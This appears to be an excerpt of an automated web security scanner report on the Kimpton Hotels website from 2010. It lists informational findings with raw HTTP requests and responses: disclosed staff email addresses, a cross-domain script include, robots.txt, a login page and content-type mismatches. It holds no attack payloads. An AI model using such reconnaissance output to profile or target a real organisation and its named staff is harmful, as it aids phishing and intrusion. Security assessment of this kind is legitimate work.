GET /hotels/factsheets/nine Host: www.kimptonhotels.com Proxy-Connection: keep-alive Referer: http://www.kimptonhotels Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Thu, 21 Oct 2010 20:20:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 190994 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Hotels: Boutique Hotels and Luxury Travel</title> <meta content="text/html; charset=iso-8859-1" http- ...[SNIP]... </script> <script src="http://www.opentable ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /development/future |
GET /development/future Host: www.kimptonhotels.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.kimptonhotels Cookie: WT_FPC=id=174.121.222.18 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 21:00:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 74470 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Hotels & Restaurants - Development - Future Development</title> <meta http-equiv="Content-Type" c ...[SNIP]... <a href="mailto:stacy.faison@kimptongroup ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /development/management |
GET /development/management Host: www.kimptonhotels.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.kimptonhotels Cookie: WT_FPC=id=174.121.222.18 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 21:00:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 69668 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Kimpton Hotels & Restaurants - Development - Management Services</title><meta http-equiv="Content-Type" conte ...[SNIP]... <a href="mailto:joe.long@kimptongroup.com"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /hotels/factsheets/nine |
GET /hotels/factsheets/nine Host: www.kimptonhotels.com Proxy-Connection: keep-alive Referer: http://www.kimptonhotels Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Thu, 21 Oct 2010 20:20:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 190994 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Hotels: Boutique Hotels and Luxury Travel</title> <meta content="text/html; charset=iso-8859-1" http- ...[SNIP]... <a href="mailto:concierge@ninezerohotel ...[SNIP]... <a href="mailto:sales@ninezerohotel.com" target="_blank"> ...[SNIP]... <a href="mailto:sales@ninezerohotel.com" target="_blank"> ...[SNIP]... <a href="mailto:concierge@ninezerohotel ...[SNIP]... <a href="mailto:concierge@ninezerohotel ...[SNIP]... <a href="mailto:concierge@ninezerohotel ...[SNIP]... <a href="mailto:concierge@ninezerohotel ...[SNIP]... <a href="mailto:sales@ninezerohotel.com" target="_blank"> ...[SNIP]... <a href="mailto:sales@ninezerohotel.com" target="_blank"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /favicon.ico |
GET /robots.txt HTTP/1.0 Host: www.kimptonhotels.com |
HTTP/1.1 200 OK Content-Length: 29 Content-Type: text/plain Last-Modified: Tue, 01 Sep 2009 17:32:17 GMT Accept-Ranges: bytes ETag: "32cdae262a2bca1:7837" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 21 Oct 2010 20:17:29 GMT Connection: close User-agent: * Disallow: |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /development/development |
GET /development/development Host: www.kimptonhotels.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.kimptonhotels Cookie: WT_FPC=id=174.121.222.18 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 21:00:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 2912 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSBADAST Cache-control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Standards Login</title> <link rel="stylesheet" type="text/css" href="../_css/global.css" <style type="tex ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.kimptonhotels |
Path: | /hotels/factsheets/nine |
GET /hotels/factsheets/nine Host: www.kimptonhotels.com Proxy-Connection: keep-alive Referer: http://www.kimptonhotels Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Content-Length: 1670 Content-Type: application/x-javascript Last-Modified: Tue, 09 Feb 2010 16:40:37 GMT Accept-Ranges: bytes ETag: "a81a8a9ba6a9ca1:7837" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 21 Oct 2010 20:20:43 GMT <!-- // Create the slideshow object ss = new slideshow("ss"); // Set the delay between slides, 1000 = 1 sec // ss.timeout = 3000; // By default, all of the slideshow images are prefetched. / ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.kimptonhotels |
Path: | /hotels/factsheets/nine |
GET /hotels/factsheets/nine Host: www.kimptonhotels.com Proxy-Connection: keep-alive Referer: http://www.kimptonhotels Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Content-Length: 3649 Content-Type: image/gif Last-Modified: Tue, 09 Feb 2010 16:38:11 GMT Accept-Ranges: bytes ETag: "9a1e7d44a6a9ca1:7837" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 21 Oct 2010 20:21:14 GMT ......JFIF.....d.d..... . . ..... ........................... ......................... ...[SNIP]... |